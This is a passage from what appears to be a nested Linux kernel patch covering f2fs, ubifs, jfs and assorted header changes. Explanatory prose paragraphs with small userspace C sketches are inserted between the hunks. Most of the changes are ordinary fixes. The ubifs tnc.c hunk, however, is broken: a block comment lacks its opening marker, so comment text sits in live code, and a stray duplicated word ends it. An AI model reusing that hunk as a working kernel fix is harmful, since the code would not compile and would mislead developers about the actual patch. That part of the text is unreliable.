++		f2fs_warn(sbi, "%s: %d over NR_PAGE_TYPE", __func__, iotype);
++		return;
++	}
+ 
+ 	if (rw == 0) {
+ 		idx = READ_IO;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index b019f63fd5403..269f89d202c61 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -192,18 +192,18 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	if (!f2fs_is_atomic_file(inode))
+ 		return;
+ 
+-	clear_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	iput(fi->cow_inode);
+-	fi->cow_inode = NULL;
+ 	release_atomic_write_cnt(inode);
+ 	clear_inode_flag(inode, FI_ATOMIC_COMMITTED);
+ 	clear_inode_flag(inode, FI_ATOMIC_REPLACE);
+ 	clear_inode_flag(inode, FI_ATOMIC_FILE);
+ 	stat_dec_atomic_inode(inode);
+ 
++	F2FS_I(inode)->atomic_write_task = NULL;
++
+ 	if (clean) {
+ 		truncate_inode_pages_final(inode->i_mapping);
+ 		f2fs_i_size_write(inode, fi->original_i_size);
++		fi->original_i_size = 0;
+ 	}
+ }
+ 
+@@ -255,6 +255,9 @@ retry:
+ 	}
+ 
+ 	f2fs_put_dnode(&dn);
++
++	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
++					index, *old_addr, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -3492,7 +3495,7 @@ int f2fs_inplace_write_data(struct f2fs_io_info *fio)
+ 
+ 	stat_inc_inplace_blocks(fio->sbi);
+ 
+-	if (fio->bio && !(SM_I(sbi)->ipu_policy & (1 << F2FS_IPU_NOCACHE)))
++	if (fio->bio && !IS_F2FS_IPU_NOCACHE(sbi))
+ 		err = f2fs_merge_page_bio(fio);
+ 	else
+ 		err = f2fs_submit_page_bio(fio);
+@@ -5131,7 +5134,7 @@ int f2fs_build_segment_manager(struct f2fs_sb_info *sbi)
+ 		sm_info->rec_prefree_segments = DEF_MAX_RECLAIM_PREFREE_SEGMENTS;
+ 
+ 	if (!f2fs_lfs_mode(sbi))
+-		sm_info->ipu_policy = 1 << F2FS_IPU_FSYNC;
++		sm_info->ipu_policy = BIT(F2FS_IPU_FSYNC);
+ 	sm_info->min_ipu_util = DEF_MIN_IPU_UTIL;
+ 	sm_info->min_fsync_blocks = DEF_MIN_FSYNC_BLOCKS;
+ 	sm_info->min_seq_blocks = sbi->blocks_per_seg;
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index 3ad1b7b6fa946..6eb5922a25361 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -670,6 +670,8 @@ static inline int utilization(struct f2fs_sb_info *sbi)
+ 
+ #define SMALL_VOLUME_SEGMENTS	(16 * 512)	/* 16GB */
+ 
++#define F2FS_IPU_DISABLE	0
++
+ enum {
+ 	F2FS_IPU_FORCE,
+ 	F2FS_IPU_SSR,
+@@ -679,8 +681,29 @@ enum {
+ 	F2FS_IPU_ASYNC,
+ 	F2FS_IPU_NOCACHE,
+ 	F2FS_IPU_HONOR_OPU_WRITE,
++	F2FS_IPU_MAX,
+ };
+ 
++static inline bool IS_F2FS_IPU_DISABLE(struct f2fs_sb_info *sbi)
++{
++	return SM_I(sbi)->ipu_policy == F2FS_IPU_DISABLE;
++}
++
++#define F2FS_IPU_POLICY(name)					\
++static inline bool IS_##name(struct f2fs_sb_info *sbi)		\
++{								\
++	return SM_I(sbi)->ipu_policy & BIT(name);		\
++}
++
++F2FS_IPU_POLICY(F2FS_IPU_FORCE);
++F2FS_IPU_POLICY(F2FS_IPU_SSR);
++F2FS_IPU_POLICY(F2FS_IPU_UTIL);
++F2FS_IPU_POLICY(F2FS_IPU_SSR_UTIL);
++F2FS_IPU_POLICY(F2FS_IPU_FSYNC);
++F2FS_IPU_POLICY(F2FS_IPU_ASYNC);
++F2FS_IPU_POLICY(F2FS_IPU_NOCACHE);
++F2FS_IPU_POLICY(F2FS_IPU_HONOR_OPU_WRITE);
++
+ static inline unsigned int curseg_segno(struct f2fs_sb_info *sbi,
+ 		int type)
+ {
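
F2FS_IPU_POLICY() stamps out one IS_* predicate per policy bit, so call sites lose the open-coded policy & (0x1 << F2FS_IPU_X) tests seen in the data.c hunk earlier. The generator pattern in isolation, as a standalone userspace sketch with made-up policy names:

	#include <stdio.h>

	#define BIT(nr)	(1u << (nr))

	enum { POLICY_FORCE, POLICY_SSR, POLICY_MAX };

	static unsigned int policy_word = BIT(POLICY_SSR);

	/* One predicate per bit, generated from a single template. */
	#define DEFINE_POLICY(name)			\
	static int IS_##name(void)			\
	{						\
		return !!(policy_word & BIT(name));	\
	}

	DEFINE_POLICY(POLICY_FORCE)
	DEFINE_POLICY(POLICY_SSR)

	int main(void)
	{
		printf("force=%d ssr=%d\n", IS_POLICY_FORCE(), IS_POLICY_SSR());
		return 0;	/* prints: force=0 ssr=1 */
	}

The new F2FS_IPU_MAX sentinel is what lets the sysfs hunk below range-check writes to ipu_policy.
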
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 1f812b9ce985b..551468dad3275 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1347,12 +1347,12 @@ default_check:
+ 	}
+ 
+ 	if (test_opt(sbi, DISABLE_CHECKPOINT) && f2fs_lfs_mode(sbi)) {
+-		f2fs_err(sbi, "LFS not compatible with checkpoint=disable");
++		f2fs_err(sbi, "LFS is not compatible with checkpoint=disable");
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (test_opt(sbi, ATGC) && f2fs_lfs_mode(sbi)) {
+-		f2fs_err(sbi, "LFS not compatible with ATGC");
++		f2fs_err(sbi, "LFS is not compatible with ATGC");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -1430,8 +1430,6 @@ static int f2fs_drop_inode(struct inode *inode)
+ 			atomic_inc(&inode->i_count);
+ 			spin_unlock(&inode->i_lock);
+ 
+-			f2fs_abort_atomic_write(inode, true);
+-
+ 			/* should remain fi->extent_tree for writepage */
+ 			f2fs_destroy_extent_node(inode);
+ 
+@@ -2306,6 +2304,12 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 		}
+ 	}
+ #endif
++	if (f2fs_lfs_mode(sbi) && !IS_F2FS_IPU_DISABLE(sbi)) {
++		err = -EINVAL;
++		f2fs_warn(sbi, "LFS is not compatible with IPU");
++		goto restore_opts;
++	}
++
+ 	/* disallow enable atgc dynamically */
+ 	if (no_atgc == !!test_opt(sbi, ATGC)) {
+ 		err = -EINVAL;
+@@ -4089,8 +4093,9 @@ static void f2fs_tuning_parameters(struct f2fs_sb_info *sbi)
+ 		if (f2fs_block_unit_discard(sbi))
+ 			SM_I(sbi)->dcc_info->discard_granularity =
+ 						MIN_DISCARD_GRANULARITY;
+-		SM_I(sbi)->ipu_policy = 1 << F2FS_IPU_FORCE |
+-					1 << F2FS_IPU_HONOR_OPU_WRITE;
++		if (!f2fs_lfs_mode(sbi))
++			SM_I(sbi)->ipu_policy = BIT(F2FS_IPU_FORCE) |
++						BIT(F2FS_IPU_HONOR_OPU_WRITE);
+ 	}
+ 
+ 	sbi->readdir_ra = true;
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 83a366f3ee80e..088b816127ecb 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -686,6 +686,15 @@ out:
+ 		return count;
+ 	}
+ 
++	if (!strcmp(a->attr.name, "ipu_policy")) {
++		if (t >= BIT(F2FS_IPU_MAX))
++			return -EINVAL;
++		if (t && f2fs_lfs_mode(sbi))
++			return -EINVAL;
++		SM_I(sbi)->ipu_policy = (unsigned int)t;
++		return count;
++	}
++
+ 	*ui = (unsigned int)t;
+ 
+ 	return count;
+diff --git a/fs/f2fs/verity.c b/fs/f2fs/verity.c
+index c352fff88a5e6..3f4f3295f1c66 100644
+--- a/fs/f2fs/verity.c
++++ b/fs/f2fs/verity.c
+@@ -81,7 +81,7 @@ static int pagecache_write(struct inode *inode, const void *buf, size_t count,
+ 		size_t n = min_t(size_t, count,
+ 				 PAGE_SIZE - offset_in_page(pos));
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		int res;
+ 
+ 		res = aops->write_begin(NULL, mapping, pos, n, &page, &fsdata);
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 765838578a722..a3eb1e8269477 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -193,7 +193,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+ 	bmp->db_agstart = le32_to_cpu(dbmp_le->dn_agstart);
+ 	bmp->db_agl2size = le32_to_cpu(dbmp_le->dn_agl2size);
+-	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG) {
++	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG ||
++	    bmp->db_agl2size < 0) {
+ 		err = -EINVAL;
+ 		goto err_release_metapage;
+ 	}
+diff --git a/fs/ubifs/budget.c b/fs/ubifs/budget.c
+index e8b9b756f0aca..d76eb7b39f564 100644
+--- a/fs/ubifs/budget.c
++++ b/fs/ubifs/budget.c
+@@ -209,11 +209,10 @@ long long ubifs_calc_available(const struct ubifs_info *c, int min_idx_lebs)
+ 	subtract_lebs += 1;
+ 
+ 	/*
+-	 * The GC journal head LEB is not really accessible. And since
+-	 * different write types go to different heads, we may count only on
+-	 * one head's space.
++	 * Since different write types go to different heads, we should
++	 * reserve one LEB for each head.
+ 	 */
+-	subtract_lebs += c->jhead_cnt - 1;
++	subtract_lebs += c->jhead_cnt;
+ 
+ 	/* We also reserve one LEB for deletions, which bypass budgeting */
+ 	subtract_lebs += 1;
+@@ -400,7 +399,7 @@ static int calc_dd_growth(const struct ubifs_info *c,
+ 	dd_growth = req->dirtied_page ? c->bi.page_budget : 0;
+ 
+ 	if (req->dirtied_ino)
+-		dd_growth += c->bi.inode_budget << (req->dirtied_ino - 1);
++		dd_growth += c->bi.inode_budget * req->dirtied_ino;
+ 	if (req->mod_dent)
+ 		dd_growth += c->bi.dent_budget;
+ 	dd_growth += req->dirtied_ino_d;
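
The calc_dd_growth() change fixes plain arithmetic: budget << (dirtied_ino - 1) computes budget * 2^(n-1), which happens to agree with the intended budget * n for one or two dirtied inodes and then overcharges, e.g. 640 instead of 480 for n = 3 with an illustrative 160-byte inode budget. A throwaway check:

	#include <stdio.h>

	int main(void)
	{
		const long budget = 160;	/* illustrative per-inode budget */

		for (long n = 1; n <= 3; n++)
			printf("n=%ld shift=%ld multiply=%ld\n",
			       n, budget << (n - 1), budget * n);
		/* n=1: 160/160, n=2: 320/320, n=3: 640/480 */
		return 0;
	}
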
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 0f29cf2011361..5e6bcce94e641 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -1151,7 +1151,6 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	int err, sz_change, len = strlen(symname);
+ 	struct fscrypt_str disk_link;
+ 	struct ubifs_budget_req req = { .new_ino = 1, .new_dent = 1,
+-					.new_ino_d = ALIGN(len, 8),
+ 					.dirtied_ino = 1 };
+ 	struct fscrypt_name nm;
+ 
+@@ -1167,6 +1166,7 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	 * Budget request settings: new inode, new direntry and changing parent
+ 	 * directory inode.
+ 	 */
++	req.new_ino_d = ALIGN(disk_link.len - 1, 8);
+ 	err = ubifs_budget_space(c, &req);
+ 	if (err)
+ 		return err;
+@@ -1324,6 +1324,8 @@ static int do_rename(struct inode *old_dir, struct dentry *old_dentry,
+ 	if (unlink) {
+ 		ubifs_assert(c, inode_is_locked(new_inode));
+ 
++		/* Budget for old inode's data when its nlink > 1. */
++		req.dirtied_ino_d = ALIGN(ubifs_inode(new_inode)->data_len, 8);
+ 		err = ubifs_purge_xattrs(new_inode);
+ 		if (err)
+ 			return err;
+@@ -1576,6 +1578,10 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 		return err;
+ 	}
+ 
++	err = ubifs_budget_space(c, &req);
++	if (err)
++		goto out;
++
+ 	lock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 
+ 	time = current_time(old_dir);
+@@ -1601,6 +1607,7 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 	unlock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 	ubifs_release_budget(c, &req);
+ 
++out:
+ 	fscrypt_free_filename(&fst_nm);
+ 	fscrypt_free_filename(&snd_nm);
+ 	return err;
+diff --git a/fs/ubifs/file.c b/fs/ubifs/file.c
+index f2353dd676ef0..10c1779af9c51 100644
+--- a/fs/ubifs/file.c
++++ b/fs/ubifs/file.c
+@@ -1032,7 +1032,7 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 		if (page->index >= synced_i_size >> PAGE_SHIFT) {
+ 			err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 			if (err)
+-				goto out_unlock;
++				goto out_redirty;
+ 			/*
+ 			 * The inode has been written, but the write-buffer has
+ 			 * not been synchronized, so in case of an unclean
+@@ -1060,11 +1060,17 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 	if (i_size > synced_i_size) {
+ 		err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 		if (err)
+-			goto out_unlock;
++			goto out_redirty;
+ 	}
+ 
+ 	return do_writepage(page, len);
+-
++out_redirty:
++	/*
++	 * redirty_page_for_writepage() won't call ubifs_dirty_inode() because
++	 * it passes I_DIRTY_PAGES flag while calling __mark_inode_dirty(), so
++	 * there is no need to do space budget for dirty inode.
++	 */
++	redirty_page_for_writepage(wbc, page);
+ out_unlock:
+ 	unlock_page(page);
+ 	return err;
+@@ -1466,14 +1472,23 @@ static bool ubifs_release_folio(struct folio *folio, gfp_t unused_gfp_flags)
+ 	struct inode *inode = folio->mapping->host;
+ 	struct ubifs_info *c = inode->i_sb->s_fs_info;
+ 
+-	/*
+-	 * An attempt to release a dirty page without budgeting for it - should
+-	 * not happen.
+-	 */
+ 	if (folio_test_writeback(folio))
+ 		return false;
++
++	/*
++	 * Page is private but not dirty - how? One sequence makes it
++	 * happen: ubifs_writepage() skipped the page because its index
++	 * is beyond i_size (for example, the file was truncated by
++	 * another process A), then the page is invalidated by an
++	 * fadvise64() syscall before process A's truncation removes it.
++	 */
+ 	ubifs_assert(c, folio_test_private(folio));
+-	ubifs_assert(c, 0);
++	if (folio_test_checked(folio))
++		release_new_page_budget(c);
++	else
++		release_existing_page_budget(c);
++
++	atomic_long_dec(&c->dirty_pg_cnt);
+ 	folio_detach_private(folio);
+ 	folio_clear_checked(folio);
+ 	return true;
+diff --git a/fs/ubifs/super.c b/fs/ubifs/super.c
+index d0c9a09988bc7..32cb147597960 100644
+--- a/fs/ubifs/super.c
++++ b/fs/ubifs/super.c
+@@ -833,7 +833,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		INIT_LIST_HEAD(&c->jheads[i].buds_list);
+ 		err = ubifs_wbuf_init(c, &c->jheads[i].wbuf);
+ 		if (err)
+-			return err;
++			goto out_wbuf;
+ 
+ 		c->jheads[i].wbuf.sync_callback = &bud_wbuf_callback;
+ 		c->jheads[i].wbuf.jhead = i;
+@@ -841,7 +841,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		c->jheads[i].log_hash = ubifs_hash_get_desc(c);
+ 		if (IS_ERR(c->jheads[i].log_hash)) {
+ 			err = PTR_ERR(c->jheads[i].log_hash);
+-			goto out;
++			goto out_log_hash;
+ 		}
+ 	}
+ 
+@@ -854,9 +854,18 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 
+ 	return 0;
+ 
+-out:
+-	while (i--)
++out_log_hash:
++	kfree(c->jheads[i].wbuf.buf);
++	kfree(c->jheads[i].wbuf.inodes);
++
++out_wbuf:
++	while (i--) {
++		kfree(c->jheads[i].wbuf.buf);
++		kfree(c->jheads[i].wbuf.inodes);
+ 		kfree(c->jheads[i].log_hash);
++	}
++	kfree(c->jheads);
++	c->jheads = NULL;
+ 
+ 	return err;
+ }
+diff --git a/fs/ubifs/sysfs.c b/fs/ubifs/sysfs.c
+index 06ad8fa1fcfb0..54270ad36321e 100644
+--- a/fs/ubifs/sysfs.c
++++ b/fs/ubifs/sysfs.c
+@@ -144,6 +144,8 @@ int __init ubifs_sysfs_init(void)
+ 	kobject_set_name(&ubifs_kset.kobj, "ubifs");
+ 	ubifs_kset.kobj.parent = fs_kobj;
+ 	ret = kset_register(&ubifs_kset);
++	if (ret)
++		kset_put(&ubifs_kset);
+ 
+ 	return ret;
+ }
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 488f3da7a6c6c..2469f72eeaabb 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -267,11 +267,18 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 	if (zbr->len) {
+ 		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+ 		if (unlikely(err))
+-			return ERR_PTR(err);
++			/*
++			 * Obsolete znodes will be freed by tnc_destroy_cnext()
++			 * or free_obsolete_znodes(); copied-up znodes should
++			 * be added back to the tnc and freed by
++			 * ubifs_destroy_tnc_subtree().
++			 */
++			goto out;
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+ 	} else
+ 		err = 0;
+ 
++out:
+ 	zbr->znode = zn;
+ 	zbr->lnum = 0;
+ 	zbr->offs = 0;
+@@ -3053,6 +3060,21 @@ static void tnc_destroy_cnext(struct ubifs_info *c)
+ 		cnext = cnext->cnext;
+ 		if (ubifs_zn_obsolete(znode))
+ 			kfree(znode);
++		else if (!ubifs_zn_cow(znode)) {
++			 * Don't forget to update the clean znode count after
++			 * a failed commit, because ubifs checks this count
++			 * while closing the tnc. A non-obsolete znode could
++			 * be re-dirtied during the commit process, so the
++			 * dirty flag is untrustworthy. The 'COW_ZNODE' flag
++			 * is set for each dirty znode before committing and
++			 * cleared once the znode becomes clean, so the clean
++			 * znode count can be derived from this flag.
++			 * flag.
++			 */
++			atomic_long_inc(&c->clean_zn_cnt);
++			atomic_long_inc(&ubifs_clean_zn_cnt);
++		}
+ 	} while (cnext && cnext != c->cnext);
+ }
+ 
+diff --git a/fs/ubifs/ubifs.h b/fs/ubifs/ubifs.h
+index 478bbbb5382f8..2f1f315810949 100644
+--- a/fs/ubifs/ubifs.h
++++ b/fs/ubifs/ubifs.h
+@@ -1623,8 +1623,13 @@ static inline int ubifs_check_hmac(const struct ubifs_info *c,
+ 	return crypto_memneq(expected, got, c->hmac_desc_len);
+ }
+ 
++#ifdef CONFIG_UBIFS_FS_AUTHENTICATION
+ void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
+ 		    const u8 *hash, int lnum, int offs);
++#else
++static inline void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
++				  const u8 *hash, int lnum, int offs) {}
++#endif
+ 
+ int __ubifs_node_check_hash(const struct ubifs_info *c, const void *buf,
+ 			  const u8 *expected);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index e44be31115a67..0584e9f6e3397 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -534,6 +534,7 @@ int acpi_bus_update_power(acpi_handle handle, int *state_p);
+ int acpi_device_update_power(struct acpi_device *device, int *state_p);
+ bool acpi_bus_power_manageable(acpi_handle handle);
+ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev);
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev);
+ int acpi_device_power_add_dependent(struct acpi_device *adev,
+ 				    struct device *dev);
+ void acpi_device_power_remove_dependent(struct acpi_device *adev,
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 41fd8352ab656..32c764fb9cb56 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -841,7 +841,8 @@ int drm_dp_add_payload_part2(struct drm_dp_mst_topology_mgr *mgr,
+ 			     struct drm_dp_mst_atomic_payload *payload);
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload);
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload);
+ 
+ int drm_dp_check_act_status(struct drm_dp_mst_topology_mgr *mgr);
+ 
+@@ -867,6 +868,9 @@ struct drm_dp_mst_topology_state *
+ drm_atomic_get_mst_topology_state(struct drm_atomic_state *state,
+ 				  struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr);
++struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_atomic_payload *
+diff --git a/include/linux/bootconfig.h b/include/linux/bootconfig.h
+index 1611f9db878e7..ca73940e26df8 100644
+--- a/include/linux/bootconfig.h
++++ b/include/linux/bootconfig.h
+@@ -59,7 +59,7 @@ struct xbc_node {
+ /* Maximum size of boot config is 32KB - 1 */
+ #define XBC_DATA_MAX	(XBC_VALUE - 1)
+ 
+-#define XBC_NODE_MAX	1024
++#define XBC_NODE_MAX	8192
+ #define XBC_KEYLEN_MAX	256
+ #define XBC_DEPTH_MAX	16
+ 
+diff --git a/include/linux/iommu.h b/include/linux/iommu.h
+index 46e1347bfa228..7695d9e14277f 100644
+--- a/include/linux/iommu.h
++++ b/include/linux/iommu.h
+@@ -401,6 +401,7 @@ struct iommu_fault_param {
+  * @iommu_dev:	 IOMMU device this device is linked to
+  * @priv:	 IOMMU Driver private data
+  * @max_pasids:  number of PASIDs this device can consume
++ * @attach_deferred: the dma domain attachment is deferred
+  *
+  * TODO: migrate other per device data pointers under iommu_dev_data, e.g.
+  *	struct iommu_group	*iommu_group;
+@@ -413,6 +414,7 @@ struct dev_iommu {
+ 	struct iommu_device		*iommu_dev;
+ 	void				*priv;
+ 	u32				max_pasids;
++	u32				attach_deferred:1;
+ };
+ 
+ int iommu_device_register(struct iommu_device *iommu,
+diff --git a/include/linux/mdio/mdio-mscc-miim.h b/include/linux/mdio/mdio-mscc-miim.h
+index 5b4ed2c3cbb9a..1ce699740af63 100644
+--- a/include/linux/mdio/mdio-mscc-miim.h
++++ b/include/linux/mdio/mdio-mscc-miim.h
+@@ -14,6 +14,6 @@
+ 
+ int mscc_miim_setup(struct device *device, struct mii_bus **bus,
+ 		    const char *name, struct regmap *mii_regmap,
+-		    int status_offset);
++		    int status_offset, bool ignore_read_errors);
+ 
+ #endif
+diff --git a/include/linux/netfilter.h b/include/linux/netfilter.h
+index d8817d381c14b..bef8db9d6c085 100644
+--- a/include/linux/netfilter.h
++++ b/include/linux/netfilter.h
+@@ -488,4 +488,9 @@ extern const struct nfnl_ct_hook __rcu *nfnl_ct_hook;
+  */
+ DECLARE_PER_CPU(bool, nf_skb_duplicated);
+ 
++/**
++ * Contains bitmask of ctnetlink event subscribers, if any.
++ * Can't be pernet due to NETLINK_LISTEN_ALL_NSID setsockopt flag.
++ */
++extern u8 nf_ctnetlink_has_listener;
+ #endif /*__LINUX_NETFILTER_H*/
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 254c8a4126a89..50042ea8e0083 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -572,6 +572,7 @@ struct pci_host_bridge {
+ 	void		*release_data;
+ 	unsigned int	ignore_reset_delay:1;	/* For entire hierarchy */
+ 	unsigned int	no_ext_tags:1;		/* No Extended Tags */
++	unsigned int	no_inc_mrrs:1;		/* No Increase MRRS */
+ 	unsigned int	native_aer:1;		/* OS may use PCIe AER */
+ 	unsigned int	native_pcie_hotplug:1;	/* OS may use PCIe hotplug */
+ 	unsigned int	native_shpc_hotplug:1;	/* OS may use SHPC hotplug */
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index b362d90eb9b0b..bc8f484cdcf3b 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3012,6 +3012,8 @@
+ #define PCI_DEVICE_ID_INTEL_VMD_9A0B	0x9a0b
+ #define PCI_DEVICE_ID_INTEL_S21152BB	0xb152
+ 
++#define PCI_VENDOR_ID_WANGXUN		0x8088
++
+ #define PCI_VENDOR_ID_SCALEMP		0x8686
+ #define PCI_DEVICE_ID_SCALEMP_VSMP_CTL	0x1010
+ 
+diff --git a/include/media/v4l2-uvc.h b/include/media/v4l2-uvc.h
+index f83e31661333b..b010a36fc1d95 100644
+--- a/include/media/v4l2-uvc.h
++++ b/include/media/v4l2-uvc.h
+@@ -99,6 +99,9 @@
+ #define UVC_GUID_FORMAT_BGR3 \
+ 	{ 0x7d, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
+ 	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
++#define UVC_GUID_FORMAT_BGR4 \
++	{ 0x7e, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
++	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
+ #define UVC_GUID_FORMAT_M420 \
+ 	{ 'M',  '4',  '2',  '0', 0x00, 0x00, 0x10, 0x00, \
+ 	 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71}
+@@ -266,6 +269,11 @@ static struct uvc_format_desc uvc_fmts[] = {
+ 		.guid		= UVC_GUID_FORMAT_BGR3,
+ 		.fcc		= V4L2_PIX_FMT_BGR24,
+ 	},
++	{
++		.name		= "BGRA/X 8:8:8:8 (BGR4)",
++		.guid		= UVC_GUID_FORMAT_BGR4,
++		.fcc		= V4L2_PIX_FMT_XBGR32,
++	},
+ 	{
+ 		.name		= "H.264",
+ 		.guid		= UVC_GUID_FORMAT_H264,
+diff --git a/include/memory/renesas-rpc-if.h b/include/memory/renesas-rpc-if.h
+index 862eff613dc79..2dcb82df0d176 100644
+--- a/include/memory/renesas-rpc-if.h
++++ b/include/memory/renesas-rpc-if.h
+@@ -65,24 +65,8 @@ enum rpcif_type {
+ 
+ struct rpcif {
+ 	struct device *dev;
+-	void __iomem *base;
+ 	void __iomem *dirmap;
+-	struct regmap *regmap;
+-	struct reset_control *rstc;
+ 	size_t size;
+-	enum rpcif_type type;
+-	enum rpcif_data_dir dir;
+-	u8 bus_size;
+-	u8 xfer_size;
+-	void *buffer;
+-	u32 xferlen;
+-	u32 smcr;
+-	u32 smadr;
+-	u32 command;		/* DRCMR or SMCMR */
+-	u32 option;		/* DROPR or SMOPR */
+-	u32 enable;		/* DRENR or SMENR */
+-	u32 dummy;		/* DRDMCR or SMDMCR */
+-	u32 ddr;		/* DRDRENR or SMDRENR */
+ };
+ 
+ int rpcif_sw_init(struct rpcif *rpc, struct device *dev);
+diff --git a/include/net/netns/conntrack.h b/include/net/netns/conntrack.h
+index e1290c159184a..1f463b3957c78 100644
+--- a/include/net/netns/conntrack.h
++++ b/include/net/netns/conntrack.h
+@@ -95,7 +95,6 @@ struct nf_ip_net {
+ 
+ struct netns_ct {
+ #ifdef CONFIG_NF_CONNTRACK_EVENTS
+-	u8 ctnetlink_has_listener;
+ 	bool ecache_dwork_pending;
+ #endif
+ 	u8			sysctl_log_invalid; /* Log invalid packets */
+diff --git a/include/net/sctp/structs.h b/include/net/sctp/structs.h
+index afa3781e3ca21..e1f6e7fc2b11e 100644
+--- a/include/net/sctp/structs.h
++++ b/include/net/sctp/structs.h
+@@ -1412,6 +1412,7 @@ struct sctp_stream_priorities {
+ 	/* The next stream in line */
+ 	struct sctp_stream_out_ext *next;
+ 	__u16 prio;
++	__u16 users;
+ };
+ 
+ struct sctp_stream_out_ext {
+diff --git a/include/net/tc_act/tc_pedit.h b/include/net/tc_act/tc_pedit.h
+index 3e02709a1df65..83fe399317818 100644
+--- a/include/net/tc_act/tc_pedit.h
++++ b/include/net/tc_act/tc_pedit.h
+@@ -4,22 +4,29 @@
+ 
+ #include <net/act_api.h>
+ #include <linux/tc_act/tc_pedit.h>
++#include <linux/types.h>
+ 
+ struct tcf_pedit_key_ex {
+ 	enum pedit_header_type htype;
+ 	enum pedit_cmd cmd;
+ };
+ 
+-struct tcf_pedit {
+-	struct tc_action	common;
+-	unsigned char		tcfp_nkeys;
+-	unsigned char		tcfp_flags;
+-	u32			tcfp_off_max_hint;
++struct tcf_pedit_parms {
+ 	struct tc_pedit_key	*tcfp_keys;
+ 	struct tcf_pedit_key_ex	*tcfp_keys_ex;
++	u32 tcfp_off_max_hint;
++	unsigned char tcfp_nkeys;
++	unsigned char tcfp_flags;
++	struct rcu_head rcu;
++};
++
++struct tcf_pedit {
++	struct tc_action common;
++	struct tcf_pedit_parms __rcu *parms;
+ };
+ 
+ #define to_pedit(a) ((struct tcf_pedit *)a)
++#define to_pedit_parms(a) (rcu_dereference(to_pedit(a)->parms))
+ 
+ static inline bool is_tcf_pedit(const struct tc_action *a)
+ {
+@@ -32,37 +39,81 @@ static inline bool is_tcf_pedit(const struct tc_action *a)
+ 
+ static inline int tcf_pedit_nkeys(const struct tc_action *a)
+ {
+-	return to_pedit(a)->tcfp_nkeys;
